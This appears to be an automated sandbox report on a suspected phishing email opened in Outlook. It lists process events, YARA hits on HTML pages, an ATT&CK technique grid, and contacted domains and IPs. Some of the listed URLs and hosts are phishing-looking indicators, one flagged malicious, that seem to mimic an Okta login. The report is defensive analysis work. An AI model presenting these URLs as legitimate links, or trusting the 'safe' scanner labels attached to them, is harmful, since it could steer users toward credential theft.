              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation21
              Browser Extensions
              1
              Process Injection
              11
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              DLL Side-Loading
              1
              Modify Registry
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Extra Window Memory Injection
              1
              Process Injection
              Security Account Manager13
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Extra Window Memory Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://m78bw.ajcffp.ru/bhanchod@cm2jzyv0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/gq51aG9xh8pi82PuT2fP1C9fcAdPeoZJ7m0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/bcZi5xLDaE5HSnMwzOs2nqEiNRjI64TDL9YoYgStZo05C31IfL5bA4X3ZxCg1DmtUfCPc7A4DU3ncS8xQ46WymneSnYPdSfafDmzsDiTo4dPOH0RZ8MChM5iBMY2SuaZY77EyMDDIoLQvd3UlmAKOJ8jNjk3WjtsDNqlcd6700%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/34wP0TuMpggj2ErklBor18hEY891040%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/klQjXXsK6UHY13vEvfc0gBMyW0bvmYMRYrXBcdip5HMwaBOlPuWhUBBahVqb781700%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/GDSherpa-bold.woff0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/uvAvGkzUPzYsrtIeQrJV34vxwRhrm3BqumnX33aAUDQoDsHJYfhlRDVlUqepnfFM0vJef2600%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/qrS5DHMtUFf3KT9q8ukN4yHvZJtYoxvAk1stcbB3pNrz0Hq2DA5aIDTTrAw3yMylkGVojua19Ref2400%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/ij9B1srBpWG7PktmXozMpAfjAkXX9fqf4mnIUavaF4cJBACQ12RVF2ht1Sw1U4ef2080%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/abENvvDzNJpbpqPZcd300%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/opDv0BklCs5PNU9b6kPW69FghgkrYCdzwOe1ACSAZpnGdcd1940%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/GDSherpa-regular.woff0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/dpk6vyIfh8hGqWI3TfqudHEv9D38iXl8OsPF44IRmxiMU5zWCDL1v0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/mnehY4yqqFrD60BTLfVjR0Zav2TfuvKMrVqdygPxhqFJZP9m781430%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/GDSherpa-regular.woff20%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/favicon.ico0%Avira URL Cloudsafe
              https://asix.jiitimeztcw.es/3461WfUGozdcdhoMoyq89200%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=7lcT5fmfv%2Bfc8owgDVlUs07Dc1ECk8JQmH6gGlADQb7m7DMyGVLvV8Z1J%2BOiUPkB%2Fc%2BHfB6mRcS51Hnriq%2Bgih62IGHTcytDgukvZjQqjcUq5u4iZuN0mzmA6y8n0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              m78bw.ajcffp.ru
              172.67.196.11
              truefalse
                unknown
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  code.jquery.com
                  151.101.2.137
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.2.189
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        high
                        github.com
                        140.82.113.3
                        truefalse
                          high
                          www.google.com
                          142.250.80.100
                          truefalse
                            high
                            s-0005.dual-s-msedge.net
                            52.123.128.14
                            truefalse
                              high
                              asix.jiitimeztcw.es
                              172.67.221.194
                              truetrue
                                unknown
                                d19d360lklgih4.cloudfront.net
                                18.164.124.96
                                truefalse
                                  high
                                  objects.githubusercontent.com
                                  185.199.111.133
                                  truefalse
                                    high
                                    ok4static.oktacdn.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                        high
                                        https://asix.jiitimeztcw.es/abENvvDzNJpbpqPZcd30false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                          high
                                          https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                            high
                                            https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                              high
                                              https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                                high
                                                https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                                  high
                                                  https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                    high
                                                    https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                      high
                                                      https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                        high
                                                        https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                          high
                                                          https://asix.jiitimeztcw.es/bcZi5xLDaE5HSnMwzOs2nqEiNRjI64TDL9YoYgStZo05C31IfL5bA4X3ZxCg1DmtUfCPc7A4DU3ncS8xQ46WymneSnYPdSfafDmzsDiTo4dPOH0RZ8MChM5iBMY2SuaZY77EyMDDIoLQvd3UlmAKOJ8jNjk3WjtsDNqlcd670false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                            high
                                                            https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                              high
                                                              https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                high
                                                                https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                  high
                                                                  https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                    high
                                                                    https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                      high
                                                                      https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                        high
                                                                        https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                              high
                                                                              https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                  high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                    high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                        high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                              high
                                                                                              https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                high
                                                                                                https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                  high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                    high
                                                                                                    https://asix.jiitimeztcw.es/opDv0BklCs5PNU9b6kPW69FghgkrYCdzwOe1ACSAZpnGdcd194false
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                        high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                          high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                            high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                              high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://asix.jiitimeztcw.es/34wP0TuMpggj2ErklBor18hEY89104false
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                                          high
                                                                                                                          https://asix.jiitimeztcw.es/GDSherpa-bold.wofffalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://m78bw.ajcffp.ru/bhanchod@cm2jzyvfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                  high
                                                                                                                                  https://asix.jiitimeztcw.es/klQjXXsK6UHY13vEvfc0gBMyW0bvmYMRYrXBcdip5HMwaBOlPuWhUBBahVqb78170false
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://asix.jiitimeztcw.es/qrS5DHMtUFf3KT9q8ukN4yHvZJtYoxvAk1stcbB3pNrz0Hq2DA5aIDTTrAw3yMylkGVojua19Ref240false
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                    high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                          high
                                                                                                                                          https://asix.jiitimeztcw.es/uvAvGkzUPzYsrtIeQrJV34vxwRhrm3BqumnX33aAUDQoDsHJYfhlRDVlUqepnfFM0vJef260false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://asix.jiitimeztcw.es/GDSherpa-regular.wofffalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://asix.jiitimeztcw.es/ij9B1srBpWG7PktmXozMpAfjAkXX9fqf4mnIUavaF4cJBACQ12RVF2ht1Sw1U4ef208false
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://asix.jiitimeztcw.es/ERcPqD/true
                                                                                                                                            unknown
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                              high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                high
                                                                                                                                                https://a.nel.cloudflare.com/report/v4?s=7lcT5fmfv%2Bfc8owgDVlUs07Dc1ECk8JQmH6gGlADQb7m7DMyGVLvV8Z1J%2BOiUPkB%2Fc%2BHfB6mRcS51Hnriq%2Bgih62IGHTcytDgukvZjQqjcUq5u4iZuN0mzmA6y8nfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                      high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                        high
                                                                                                                                                        https://asix.jiitimeztcw.es/dpk6vyIfh8hGqWI3TfqudHEv9D38iXl8OsPF44IRmxiMU5zWCDL1vfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700950v1s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://asix.jiitimeztcw.es/mnehY4yqqFrD60BTLfVjR0Zav2TfuvKMrVqdygPxhqFJZP9m78143false
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule702950v1s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702651v1s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702201v1s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703951v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700651v1s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule701800v1s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702801v1s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703101v1s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703401v0s19.xmlfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule701551v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701101v1s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://asix.jiitimeztcw.es/GDSherpa-regular.woff2false
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700750v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701701v1s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703900v0s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702401v1s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700051v1s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700900v1s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702900v1s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703550v0s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule701351v1s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://asix.jiitimeztcw.es/3461WfUGozdcdhoMoyq8920false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              142.250.80.46
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              140.82.113.3
                                                                                                                                                                                                              github.comUnited States
                                                                                                                                                                                                              36459GITHUBUSfalse
                                                                                                                                                                                                              104.21.92.165
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              185.199.111.133
                                                                                                                                                                                                              objects.githubusercontent.comNetherlands
                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                              172.67.196.11
                                                                                                                                                                                                              m78bw.ajcffp.ruUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              142.250.81.238
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              142.251.40.110
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
